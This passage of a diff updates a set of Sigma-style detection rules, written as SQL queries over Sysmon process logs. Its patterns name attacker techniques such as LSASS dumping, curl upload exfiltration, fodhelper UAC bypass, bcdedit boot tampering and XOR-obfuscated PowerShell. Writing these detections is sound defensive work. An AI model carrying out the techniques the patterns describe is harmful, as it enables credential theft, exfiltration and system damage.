"attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.persistence", + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentImage LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "status": "test", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Scheduled Task Creation", - "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", "status": "test", - "description": "Detects the creation of scheduled tasks in user session", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" + "attack.exfiltration", + "attack.t1567", + "attack.t1105" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Scripts created by developers and admins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_bcdedit_susp_execution.yml" + }, + { + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", - "status": "experimental", - "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", + "status": "test", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "status": "test", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - 